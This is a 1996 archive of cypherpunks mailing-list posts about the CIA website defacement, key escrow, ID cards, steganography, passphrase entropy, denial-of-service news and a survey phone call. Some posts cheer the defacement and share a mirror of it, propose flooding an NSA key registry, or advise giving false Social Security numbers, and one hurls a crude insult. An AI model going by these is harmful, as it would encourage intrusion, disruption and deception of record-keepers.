at ilf.net Thu Sep 19 16:39:20 1996 From: chaos at ilf.net (Lord of Entropy) Date: Fri, 20 Sep 1996 07:39:20 +0800 Subject: CIA hacked Message-ID: <3.0b19.32.19960919162956.0071bce0@ilf.net> At 01:11 AM 9/20/96 +1000, you wrote: >+http://www.odci.gov/cia >+Seems the DOJ hack was a good inspiration. Heh! Life's good when you're >+willing to work at it. >Did you or anyone get a mirror of the site?! I wanna set one up! ;) http://www.ilf.net/hacked.websites/cia/ -- T 37 5F 68 3F 0F 1B A3 6B 7F 90 EA 40 73 49 2F B0 R Information Liberation Front U NO http://www.ilf.net/ chaoS at ilf.Net T E From tcmay at got.net Thu Sep 19 16:55:01 1996 From: tcmay at got.net (Timothy C.
May) Date: Fri, 20 Sep 1996 07:55:01 +0800 Subject: monkey-wrenching GAK Message-ID: At 4:46 PM 9/19/96, Ray Arachelian wrote: >Another thing you can do: generate huge key pairs all day long and submit >them to the NSA. If enough people do this, they will be flooded and >overworked, of course they may ignore them, etc, or make it hard to do >so, but if everyone generates a 4K key every hour or two and discards it, >but gives the key pair to the NSA anyway, they will run out of storage >space, or at least it will make it much much harder for them to figure >out which key you are using for conversation X. Ah, but what about the _fee_ for registering a key? You really didn't think this would be free, did you? (It costs money to register cars, guns, etc., so why would it be "free" to register a key?) Besides being a revenue enhancement tool, charging a fee stops this sort of flooding attack. (Note: One of my biggest objections to GAK, besides the political/civil rights issue, is what it does to systems which generate lots and lots of keys on an ad hoc, continuing basis. GAK, if enforced, puts a major speed bump in the way and increases costs, possibly making certain kinds of systems infeasible.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From gary at systemics.com Thu Sep 19 16:57:22 1996 From: gary at systemics.com (Gary Howland) Date: Fri, 20 Sep 1996 07:57:22 +0800 Subject: DL in exchange for fingerprint In-Reply-To: Message-ID: <3241B75D.41C67EA6@systemics.com> Timothy C.
May wrote: > > (Yes, I disliked being thumb-printed, but I could see no viable > alternative. I'm sure Duncan has some scheme to declare himself a Botswanan > exchange student, but I decided being thumb-printed was the lesser hassle.) Sure, it's always less hassle doing what they want. Privacy doesn't come for free. It's easier to let the police search you in the street than it is to make them arrest you so that you can make a formal complaint. > By the way, the next rev of the California driver's license will reportedly > have one's *Social Security Number* printed on the card! So much for the > statement clearly printed on my card: > > "For social security and tax purposes -- not for identification." So? My passport reads "let the bearer travel without let or hindrance" - yet I still get enormous grief every time I enter the country that issued it. > Paraphrasing that famous quote, just which part of "not for identification" > don't they understand? Hmm - who are you paraphrasing here? (Just curious). > (Indeed, I am asked for my SSN in many places. A few times I've refused to > give it. Once the clerk just said, "Fine, I have it here on my computer > anyway." Refusing to give it is probably no longer meaningful, due to > massively cross-linked data bases.) > > Again, we desperately need an infrastructure of "credentials without identity." Or widespread disinformation - don't stand up for your "right" not to disclose your SSN - simply give them one with errors in - that way their whole database starts to lose value. Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. 
pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From felipe at xs4all.nl Thu Sep 19 17:23:57 1996 From: felipe at xs4all.nl (Felipe Rodriquez) Date: Fri, 20 Sep 1996 08:23:57 +0800 Subject: Declaration against German censorship Message-ID: <199609181150.NAA18038@xs1.xs4all.nl> Send a mail to tuamotu at duplox.wz-berlin.de to sign this declaration against current German censorship and IP-filtering of sites. ------------------------------------------------------------------ A Letter of Protest On August 30th 1996, the German Federal Prosecutor wrote to German Internet providers and on-line services telling them that they could possibly be charged with aiding and abetting persons who are currently the subject of a preliminary inquiry by the German Federal Prosecutor due to an article published in a magazine which offended German anti-terrorism laws. The German Federal Prosecutor wrote (excerpt): "Under the following Internet addresses ... [the GFP names two WWW sites, which will be not quoted here because we do not refer to the actual case of a specific text which gives cause for complaint, instead we are interested in the act of censorship as such] ..the complete issue is available... [of the magazine who is subject of preliminary inquiry by the GFP. The GFP explains why they deem the text to be illegal in Germany]... We want you to be aware that you are possibly making yourself liable to prosecution by acting as an accessory to criminal offences [according to German anti-terrorist laws §§ 129a,3 and 130a,1 StGB] if you allow the text to be accessed via your Internet dial-ins and host computers."
Although the German Federal Prosecutor merely pointed out the possibility of being liable to prosecution and although the opinion of the GFP as expressed in the letter has not as of yet been proven right by a court decision, several German providers responded to the letter by temporarily (for no longer than 28 days) closing off the WWW sites where the electronic version of the article was previously available to Internet readers. From the point of view of a WWW site, for example xs4all.nl in the Netherlands, the action of German providers (among them the largest German providers) means a blockage of all of their WWW information for a great number of German netizens because of a single web page among the thousands of pages xs4all offers at their site. We think denying access to WWW sites is wrong. Beside the fact that it is practically impossible to filter the flow of data in order to keep specific WWW pages which are stored on WWW sites in other countries outside of the German state territory when Germans are allowed to contact these countries by phone for example - unless the German government decided upon massive censorship measurements which would be not according to German Laws as they are today - we demand equal rights for Internet providers and TelCo providers, thus making the GFP's letter unsubstantiated if equal rights were applied. So far, neither German Telecom nor the German postal service have been liable to prosecution by acting as accessories to criminal offences by simply transporting telephone or mail data. xs4all and xs2all Internet Information!
back to the letter of protest in german language Internet Information (available in English, Dutch, German): http://www.xs4all.nl/~felipe/germany.html --- latest news Internet Information in German language http://www.spiegel.de/aktuell/sonv0296370906.html http://www.nadir.org/NA/Text/Archiv/Medien/Zeitschriften/radikal/netzzensur/ http://www.anwalt.de/ictf/mirror From deviant at pooh-corner.com Thu Sep 19 17:29:26 1996 From: deviant at pooh-corner.com (The Deviant) Date: Fri, 20 Sep 1996 08:29:26 +0800 Subject: All Bets Off In-Reply-To: Message-ID: On Thu, 19 Sep 1996, Daniel Christopher Miskell wrote: > Date: Thu, 19 Sep 1996 11:30:32 -0400 > From: Daniel Christopher Miskell > To: Rabid Wombat > Cc: cypherpunks at toad.com > Subject: Re: All Bets Off > > >On Tue, 17 Sep 1996, Jeff Davis wrote: > > [lots of quoting rm'd] > > Tom Clancy is not a military-hired brain, but to make his novels realistic and > to do justice to the people he portrays, he does a LOT of research. He is a > highly respected author, and I have no doubt that his statement is based on > his personal findings, collected for a previous novel. > I believe he was also a Captain in the Navy... --Deviant Old MacDonald had an agricultural real estate tax abatement.
From dlv at bwalk.dm.com Thu Sep 19 18:03:02 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 20 Sep 1996 09:03:02 +0800 Subject: CIA hacked In-Reply-To: <199609191719.TAA28972@spoof.bart.nl> Message-ID: >From remailer at mailhub.bart.nl Thu Sep 19 13:18:03 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Thu, 19 Sep 96 16:10:20 EDT for dlv Received: from spoof.bART.nl by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA03960 for dlv at bwalk.dm.com; Thu, 19 Sep 96 13:18:03 -0400 Received: (from remailer at localhost) by spoof.bart.nl (8.7.5/8.6.8) id TAA28972 for dlv at bwalk.dm.com; Thu, 19 Sep 1996 19:19:58 +0200 (MET DST) Date: Thu, 19 Sep 1996 19:19:58 +0200 (MET DST) Message-Id: <199609191719.TAA28972 at spoof.bart.nl> To: dlv at bwalk.dm.com From: remailer at 2005.bart.nl (Anonymous) Comments: Please report misuse of this automated remailing service to The contents of this message are neither approved or condoned by nl.com or our host bART Internet. *** Replying to it will not send your reply to the sender *** There is no way to determine the originator of this message. If you wish to be blocked from receiving all anonymous mail, send your request to the mailing list. The operator of this particular remailer can be reached at Subject: Re: CIA hacked Return-Path: To: cypherpunks at toad.com Subject: Re: CIA hacked From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Comments: Dole/Kemp '96! Date: Thu, 19 Sep 96 08:08:39 EDT Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Sender: owner-cypherpunks at toad.com Mike van der Merwe writes: > I'm sure we will find out in a few years that Microsoft invented the > Net. Or brought it to the masses. Or saved it from a certain and > early demise. Or all of the above. > JAMES SEYMOUR >Dr. John M. Grubor created the 'net. Who created you? You tub of shit? From tcmay at got.net Thu Sep 19 18:08:23 1996 From: tcmay at got.net (Timothy C. 
May) Date: Fri, 20 Sep 1996 09:08:23 +0800 Subject: DL in exchange for fingerprint Message-ID: At 9:13 PM 9/19/96, Gary Howland wrote: >Timothy C. May wrote: >> >> (Yes, I disliked being thumb-printed, but I could see no viable >> alternative. I'm sure Duncan has some scheme to declare himself a Botswanan >> exchange student, but I decided being thumb-printed was the lesser hassle.) > >Sure, it's always less hassle doing what they want. Privacy doesn't >come for free. It's easier to let the police search you in the street >than it is to make them arrest you so that you can make a formal >complaint. So, just what it is _your_ method of dealing with this? While it is noble to talk about fighting the system, just how do you go about doing it yourself? Do you simply drive without a valid driver's license? I know some folks who do, of course, but it's not something that's "worth it" to me. (This space reserved for your lecture about how I need to be prepared to go to jail to defend my right not to be thumbprinted, etc. On second thought, why don't you be the one to go to jail, and then you can let us know your experiences.) >> Paraphrasing that famous quote, just which part of "not for identification" >> don't they understand? > >Hmm - who are you paraphrasing here? (Just curious). "What part of "No" don't you understand?" and "What part of "Congress shall make no law" don't you understand?" --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." 
From steve at tsearch.com Thu Sep 19 18:17:13 1996 From: steve at tsearch.com (Steve Dyson) Date: Fri, 20 Sep 1996 09:17:13 +0800 Subject: unscribe cypherpunks@toad.com Message-ID: unscribe cypherpunks at toad.com ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] Steve Dyson Technology Search International Consultant 25 Metro Drive, STE 238 steve at tsearch.com San Jose, CA 95110 VOICE 408.437.9500 FAX 408.437.1033 "...dockin-doid, dockin-doid.........dockin- doid" ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] From sunder at brainlink.com Thu Sep 19 18:40:50 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Fri, 20 Sep 1996 09:40:50 +0800 Subject: Stego inside encryption In-Reply-To: Message-ID: On 19 Sep 1996, Mullen Patrick wrote: > To take this one step further, has anyone tried to ever use this method as > an encryption method? You could hide data in a stream of random bits, using > position as the encryption method. Obviously, the data would not be stored > in packets; rather as single bits strewn throughout the stream. Even ASCII > characters could be hidden in such a system very well, as the possibility of > choosing the correct 8 bits (extended char set) from the data stream when > any combination has equal potential of being the correct sequence would be > extremely difficult. Error checking/correcting code could even be used. > > Using this system, the placement algorithm would be the focus of attack. If > an algorithm which has a sufficiently random placement was used, extracting > the correct bits would be difficult. Another way to increase the security > would be to hide the correct message inside a bitstream created by using > the same method on other similar messages. (Hiding a real message inside > bogus messages. Hmm... Which one's real?) I've written something similar to this idea a few years ago. :) You might want to check it out. 
Do a net search for WNS210.ZIP at your nearest good crypto ftp site. You might want to try ftp.wimsey.ca. ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From rah at shipwright.com Thu Sep 19 19:04:56 1996 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 20 Sep 1996 10:04:56 +0800 Subject: Clickshare launches Internet's first multi-site micropaymentsservice Message-ID: --- begin forwarded text Date: Thu, 19 Sep 1996 12:16:39 -0400 (EDT) Mime-Version: 1.0 To: "mpay list (MIT)" From: felixk at panix.com (Felix Kramer) Subject: Clickshare launches Internet's first multi-site micropayments service Sender: owner-micropay at ai.mit.edu Precedence: bulk Reply-To: micropay at ai.mit.edu Here are the first paragraphs of a press release, the rest of which can be found at: http://www.clickshare.com/pubpack/releases.html Clickshare launches Internet's first multi-site micropayments service "Internet Information Utility" delivers commerce a la carte WILLIAMSTOWN, Mass., Sept. 16 -- Clickshare Corporation's pioneering multi-site, single-ID, Internet micropayment system went live on Friday as users began clicking on -- and paying for -- information online. Purchases from Friday to Sunday by over a dozen first registrants totaled $62.60. "We're the web's first working multi-site distributed user-management and micropayment service," said Bill Densmore, Clickshare's chairman. "Now publishers can charge for valuable information on the Internet, rather than giving it away." 
"Now that 'The Internet's Information Utility' (sm) is up and running," said Felix Kramer, Clickshare marketing director, "we'll finally see whether people will buy information by the click." -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- Felix Kramer, Marketing Director CLICKSHARE CORP. felix at clickshare.com Direct: 212/866-4864 www.clickshare.com Corporate: 413/458-8001 www.nlightning.com (personal) fax: 212/866-5527 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From Tunny at inference.com Thu Sep 19 19:08:39 1996 From: Tunny at inference.com (James A. Tunnicliffe) Date: Fri, 20 Sep 1996 10:08:39 +0800 Subject: Private key server Message-ID: Gary Howland[SMTP:gary at systemics.com] wrote: f_estema at alcor.concordia.ca wrote: > > On Wed, 18 Sep 1996, Gary Howland wrote: > > > If you really want this functionality, a nicer solution is to use your > > passphrase as a seed to the key generator - that way you never need > > So much for entropy. If you can actually remember your seed generator, it > can't be that random, can it? I don't know about you, but I can certainly remember enough bits to be secure. The fact that passphrases are so widely used goes to show that I'm not the only one that can do this. [Darth Vader voice:] "Don't overestimate the entropy of your passphrase" Let's see, 128 bits (say) of info, mapped comfortably into the upper case letters and digits (5 bits/char), means a string of about 26 *really random* characters. An example might be "KQI8CH49SCK3PKWNA37AYV9QJ5". If that just rolls off your toungue, you have my respect (and I have pi memorized to 110 decimal places!) This assumes a full 5 bits of entropy/character. 
If your passphrase is more coherent (i.e., less entropy) than that, like "Strange kr0ws fly 1azily at MIDnight", it almost certainly contains _far_ less entropy than that. 128 bits of truly arbitrary (random) info is a fair amount of information to comfortably remember. Mind you, I think a properly constructed passphrase (like the one above) is pretty darn resistant against any sort of reasonable dictionary or quasi-brute force attack. But I don't think it's got anywhere near, say, 128 bits of entropy. Probably closer to half that. Anyway, the point I was making that this method would be preferable to a "secret key server". My proposal would offer the same security, would it not? (The secret key server is arguably less secure than generating keys from passphrases, since key generation takes longer than IDEA decryption - however, they are still of the same order). Using a pass phrase to seed key generation (or more directly, using the hash of a pass phrase as a key) does not increase the entropy, of course. Not sure if this is relevant to your claim, as I've sort of lost track of the original context! Best regards, Gary Tunny ====================================================================== James A. Tunnicliffe | WWWeb: http://www.inference.com/~tunny Inference Corporation | PGP Fingerprint: CA 23 E2 F3 AC 2D 0C 77 tunny at Inference.com | 36 07 D9 33 3D 32 53 9C ======================================================================
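The entropy arithmetic in the message above, worked through as an added example (not part of the original post and not code from PGP or any key server). It assumes a 32-symbol alphabet so that each random character carries exactly 5 bits, a constructed 16-word list, and SHA-256 truncated to 16 bytes as a stand-in for "the hash of a pass phrase as a key"; all function names are hypothetical.

```python
"""Passphrase entropy versus derived-key length (added example)."""
import hashlib
import itertools
import math
import secrets

# Assumption: a 32-symbol alphabet (RFC 4648 base32), so each uniformly
# random character carries exactly 5 bits, as in the message's estimate.
ALPHABET_32 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"

# Constructed 16-word list (4 bits per word), small enough to enumerate.
WORDS = ["amber", "birch", "cobalt", "delta", "ember", "fjord", "garnet",
         "harbor", "indigo", "jasper", "kelp", "lotus", "maple", "nickel",
         "onyx", "pewter"]


def chars_needed(target_bits: int, alphabet_size: int) -> int:
    """Uniformly random characters needed to reach target_bits of entropy."""
    return math.ceil(target_bits / math.log2(alphabet_size))


def words_needed(target_bits: int, list_size: int) -> int:
    """Uniformly random words from a list of list_size to reach target_bits."""
    return math.ceil(target_bits / math.log2(list_size))


def random_secret(target_bits: int = 128, alphabet: str = ALPHABET_32) -> str:
    """Generate a string that really carries >= target_bits (CSPRNG-chosen)."""
    n = chars_needed(target_bits, len(alphabet))
    return "".join(secrets.choice(alphabet) for _ in range(n))


def wordlist_entropy_bits(n_words: int, list_size: int) -> float:
    """Entropy of n_words drawn independently and uniformly from the list.
    Valid only for random selection; a human-composed phrase has less."""
    return n_words * math.log2(list_size)


def derive_key(passphrase: str) -> bytes:
    """Hash of the passphrase used directly as a 128-bit key.
    Assumption: truncated SHA-256 stands in for the real system's hash.
    A slow KDF would raise the cost per guess, not the entropy."""
    return hashlib.sha256(passphrase.encode("utf-8")).digest()[:16]


def all_phrases(words, n_words):
    """Every phrase the selection rule can produce (the whole input space)."""
    return [" ".join(t) for t in itertools.product(words, repeat=n_words)]


def effective_key_bits(candidates) -> float:
    """log2 of the number of distinct keys reachable from the candidates.
    This, not the 128-bit key length, bounds the keyspace actually in use."""
    return math.log2(len({derive_key(p) for p in candidates}))


if __name__ == "__main__":
    print("chars for 128 bits, 32 symbols:", chars_needed(128, 32))
    print("chars for 128 bits, 36 symbols:", chars_needed(128, 36))
    print("sample 128-bit secret:", random_secret())
    phrases = all_phrases(WORDS, 3)
    print("3 words from 16:", wordlist_entropy_bits(3, 16), "bits in,",
          effective_key_bits(phrases), "bits out of a 128-bit key")
```

The three-word phrases yield 128-bit keys, yet only 4096 distinct keys exist, which is the sense in which hashing a passphrase does not increase its entropy.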
From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 19 19:21:10 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Fri, 20 Sep 1996 10:21:10 +0800 Subject: Commentary on news coverage of attacks Message-ID: <01I9O1AWQ91S8Y4ZFQ@mbcl.rutgers.edu> I thought it was interesting to note what got deleted - namely cryptographic (signature) protection against such attacks - and what got included - namely faked addresses. You can get the original NYT version via JYA. -Allen > _________________________________________________________________ > webslingerZ > _________________________________________________________________ > CONCERN AT RASH OF ATTACKS BY HACKERS ON INTERNET SITES > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 The Financial Times > SAN FRANCISCO (Sep 19, 1996 00:23 a.m. EDT) -- A rash of hacker > attacks on commercial Internet sites -- including one in which the > services of Panix, a New York-based Internet access provider, were > seriously disrupted -- has raised new concerns about the security and > reliability of the worldwide computer network. [...]
> Attacks have been "isolated incidents," said Pete Solvik, > vice-president of information systems at Cisco Systems, the leading > manufacturer of routing equipment for the Internet. The company, > however, is concerned that the problem could spread, disrupting > Internet service for millions of users and effectively closing down > large commercial sites on the Internet. > With many banks and retailers now planning Internet services, the > potential for financial losses as a result of such attacks is rising. > Disruption of Internet service can also be a serious problem for the > tens of thousands of businesses that now rely on electronic mail and > sites on the World Wide Web to communicate with their partners and > customers. > The impact of a large-scale "denial-of-service attack" can be > devastating, said Solvik. Within a minute, a computer linked to the > Internet can be completely overwhelmed and it may take days before > service can be restored. [...] > Because the attacks came from fake addresses on the Internet, it was > "impossible to trace the source without a major effort on the part of > all Internet service providers between Panix and the attacking party," > said Rosen. > "The nature of the Internet, which is designed to let machines > communicate with a minimum exchange of identifying information, makes > every site on the Internet vulnerable," said Rosen. > The Federal Bureau of Investigation's New York Computer Investigations > Threat Assessment Center is understood to be investigating the attack > on Panix. Computer Emergency Response Teams, a US organization that > collates information about security and technical problems on the > Internet, are looking into the incident. [...] > Copyright © 1996 Nando.net From rah at shipwright.com Thu Sep 19 19:29:14 1996 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 20 Sep 1996 10:29:14 +0800 Subject: It seems a million dollars in cash is illegal... Message-ID: ...in India, anyway. Yes. I know. 
He probably didn't *earn* it. Well, not *that* way, anyway... Cheers, Bob Hettinga --- begin forwarded text To: economist-politics at postbox.co.uk From: The Economist Subject: Politics This Week (September 13th - September 19th) Data: Thu Sep 19 17:33:56 GB 1996 Sender: Nobody Date: Thu, 19 Sep 1996 17:33:57 +0100 **************************************************************************** Welcome to Politics This Week (September 13th - September 19th) A weekly summary of the world's main events from The Economist Also available at http://www.economist.com/ **************************************************************************** Indian police arrested Sukh Ram, a former communications minister, a month after police found over $1m in cash hidden in his house. Mr Ram was arrested on his return from abroad. Information about this newsletter This is a free newsletter published by The Economist newspaper. To find out where best to direct queries to The Economist, do not reply to this message. Send a blank e-mail message to help at economist.com If you are having problems receiving this list, send an e-mail to support at postbox.co.uk To cancel your subscription, send an e-mail with the message "leave economist-politics" to newscaster at postbox.co.uk Alternatively, you can cancel your subscription (or re-subscribe at any time) by visiting http://www.economist.com/mailing/ Copyright The Economist Newspaper Limited --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From bdurham at metronet.com Thu Sep 19 19:35:55 1996 From: bdurham at metronet.com (Brian Durham) Date: Fri, 20 Sep 1996 10:35:55 +0800 Subject: undeliverable mail Message-ID: <3241DD69.1794@metronet.com> Anyone else having problems posting? 
I've been getting a mailbox full problem from a vaxen at mqg-smtp3.usmc.mil ... if anyone is interested, will forward error. This post may make it through ... From froomkin at law.miami.edu Thu Sep 19 19:48:23 1996 From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law) Date: Fri, 20 Sep 1996 10:48:23 +0800 Subject: Internet Drivers' Licenses In-Reply-To: <43kcuD64w165w@bwalk.dm.com> Message-ID: See http://www.law.miami.edu/~froomkin/articles/trustedno.htm#ENDBACK31 for another use of the term... **Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"** A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's hot here. And humid. From tcmay at got.net Thu Sep 19 19:50:52 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 20 Sep 1996 10:50:52 +0800 Subject: unimbibe cypherpunks@toad.com Message-ID: At 11:24 AM 9/19/96, Steve Dyson wrote: >unscribe cypherpunks at toad.com > Please unimbibe me, too! I tried "unscrive," "unsuscrive," and "unscribe," and even "unsuckscribe," so now I'm trying "unimbibe." Help, I'm trapped on this list and I can't unscrive from it! --Tim (Of course, had I kept any of the many instructions that have been posted, or the instructions I got when I got signed up, I would've known that the correct way to "unsubscribe" is to send a message to "majordomo at toad.com" with the body message of "unsubscribe cypherpunks".) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From frogfarm at yakko.cs.wmich.edu Thu Sep 19 19:51:04 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Fri, 20 Sep 1996 10:51:04 +0800 Subject: (fwd) Strange telephone call Message-ID: <199609192333.TAA25736@yakko.cs.wmich.edu> >From: vandy at avana.net (Vandy Terre) Newsgroups: alt.folklore.urban,alt.pagan,alt.revenge,alt.snowmobiles,ga.forsale,ga.general,misc.consumers.frugal-living,misc.rural Subject: Strange telephone call Date: Wed, 18 Sep 1996 14:27:05 GMT Organization: Tanglewood Farm Lines: 59 Message-ID: <323ffe3d.188173 at news.avana.net> This message is being cross posted to several groups that I read in an effort to find an answer to my questions. Please email replies, not all posts make it to my server. If you must answer on the net, please trim headers. Okay, this is the story. I just received a strange telephone call. My caller ID system shows only 'OUT_OF_AREA-----000-----'. The female voice claimed to be taking a survey for the Department of Defense and that she was acting as a representative of my government. She did not say US Government or State Government, just 'your government'. When I said that there was no way for me to verify she was what she claimed, she gave me a business name, supervisor's name and an 800 telephone number. She claimed this survey had to do with a Department of Defense program named 'YATS' and told me that if my household did not qualify, then our telephone number would be removed from the calling list. She then ask the same question three different ways. The question was 'Is there anyone in your household between the ages of 16 and 24?'. 
When I said no for the third time, she said we did not qualify and hung up. So here are my questions. Was this a legitimate call? The government should already know exactly how many people are in my household. It is on my tax forms every year and many other places. Why would any government office or representative of a government office be making cold calls to unknown telephone numbers for any kind of survey? Who or what is 'Westat'? This is the name of the company this woman supposedly represented. The telephone number given to me is 1-800-638-8778. The same woman answered it as called me. Seems like a company doing a survey for the government would have more than one employee. Her supervisor's name is Chris Martin. Is she Chris Martin? In a single person office, I guess you would be your own supervisor. The woman never gave her personal name. This survey was supposed to be for the Department of Defense for a program named 'YATS'. What is YATS? My biggest question is, Is this a new face on an old scam? Instead of posing as the local fire department looking for donations, are the scam-artist now posing as the government? What a way to case a home in preparation for theft or running yet another scam of questionable legality. Yes, I am a very suspicious person. I have seen too many scams being run. Thank you for taking the time to read this. Please answer by email. Please trim headers if answering on the net. Thank you. Any significantly advanced scam vandy at avana.net is indistinguishable from religion. Georgia, USA -- frogfarm at yakko.cs.wmich.edu (Damaged Justice) is officially declared Unmutual. "Would I had phrases that are not known, utterances that are strange, in new language that has not been used, free from repetition, not an utterance which has grown stale, which men of old have spoken." 
From frogfarm at yakko.cs.wmich.edu Thu Sep 19 19:52:10 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Fri, 20 Sep 1996 10:52:10 +0800 Subject: (fwd) Re: Strange telephone call Message-ID: <199609192334.TAA25744@yakko.cs.wmich.edu> >From: MS Newsgroups: misc.consumers.frugal-living Subject: Re: Strange telephone call Date: Thu, 19 Sep 1996 18:19:12 -0400 Organization: NSTN Lines: 159 Message-ID: <3241C6DF.17CE at fox.nstn.ca> X-No-Archive: Yes I did an Altavista search on Westat with these results: 1.) Westat's Internet site 2.) A document from the DEFENCE LOGISTICS AGENCY on YATS I guess that phone call wasn't a scam after all... BTW, whenever in doubt, just run your Internet browser and use the search engines. You'll be amazed at how much info you can get by just typing in a word or two. MS 1.) Quoted from Westat's home page (http://www.westat.com/) Westat An Employee-Owned Research Corporation Welcome to Westat Westat is an employee-owned corporation headquartered in the greater Washington, DC, metropolitan area. We conduct surveys and provide statistical research and related services to the agencies of the U.S. Government and a broad range of institutional and business clients. Our diverse staff of 800 enables us to assemble project teams to meet the challenges of complex research projects. With a more than 30-year history of technical and managerial excellence, Westat has emerged as one of the foremost statistical research and evaluation organizations in the United States. Additional Information about Westat: Research Capabilities Program Areas Employee Ownership How to Contact Westat Opportunities for Systems Professionals Statistical Software (WesVarPC) Last Modified: May 14, 1996 Site comments or problems: Webmaster at Westat.com Please note: Pages at this site have been designed for viewing with Netscape 1.1X Navigator using monitors displaying at least 256 colors. 
Use of a different HTML viewer or a display with less than 256 colors may result in the loss of page layout information and/or poor quality images. 2.) Document on 'YATS' (the following lines as they appeared on Altavista's search) No Title May 1, 1996. DEFENSE LOGISTICS AGENCY. Environmental Research Institute of Michigan, Ann Arbor, Michigan, is being awarded an estimated $44,425,774... http://www.fedmarket.com/blue5-1.html - size 8K - 29 May 96 *********** Westat, Incorporated, Rockville, Maryland, is being awarded a $1,630,647 increment as part of a $15,155,183 firm fixed price contract for a Communications Enlistment Decisions - Youth Attitude Tracking Study (YATS). This effort requires the contractor to administer half-hour computer assisted telephone interviews (CATIs) in an annual survey of 10,000 16-24 year-old men and women that evaluates their attitudes toward the military. The purpose of this survey is to provide the Armed Services with market data that enables them to more accurately target advertising and recruiting activities to appeal to potential recruit populations. The project includes design and selection of the sample, modification of the survey instrument, questionnaire administration, compilation and weighting of the data, production of preliminary and public use data tapes and preparation of documentation and analytical reports. Work will be performed in Rockville, Maryland, and is expected to be completed by July 31, 2001. Contract funds will not expire at the end of the current fiscal year. There were 45 bids solicited on January 26, 1996, and two bids received. The contracting activity is the Defense Supply Service-Washington, Washington, D.C. (DASW01-96-C-0041). ************* -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information Tell your friends 'n neighbors you read this on the evil pornographic Internet "Where one burns books, one will also burn people eventually." 
